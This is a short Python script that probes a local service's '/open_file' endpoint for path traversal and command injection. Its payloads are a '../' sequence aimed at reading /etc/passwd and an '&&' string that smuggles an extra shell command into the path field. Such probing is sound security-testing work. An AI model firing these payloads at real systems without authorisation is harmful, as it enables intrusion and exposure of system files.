import os
import requests

def test_vulnerabilities():
    """
    This function tests for two vulnerabilities in the '/open_file' endpoint.
    1. Path Traversal vulnerability: It attempts to access sensitive files by providing a payload with multiple "../" to traverse directories.
    2. Command Injection vulnerability: It attempts to execute additional commands by appending a payload with "&&" and an echo statement.

    :return: None
    """
    # Test path traversal vulnerability
    payload = "../../../../../../../../../../etc/passwd"
    url = "http://localhost:9600/open_file"
    data = {"path": payload}
    
    response = requests.post(url, json=data)
    if response.status_code == 200:
        if "root:x" in response.text:
            print("Path Traversal vulnerability found!")
        else:
            print("Path Traversal vulnerability not found.")
    else:
        print("Error: ", response.status_code)

    # Test command injection vulnerability
    payload = "&& echo 'Command Injection Test'"
    data = {"path": payload}
    
    response = requests.post(url, json=data)
    if response.status_code == 200:
        if "Command Injection Test" in response.text:
            print("Command Injection vulnerability found!")
        else:
            print("Command Injection vulnerability not found.")
    else:
        print("Error: ", response.status_code)

# Call the test function
test_vulnerabilities()
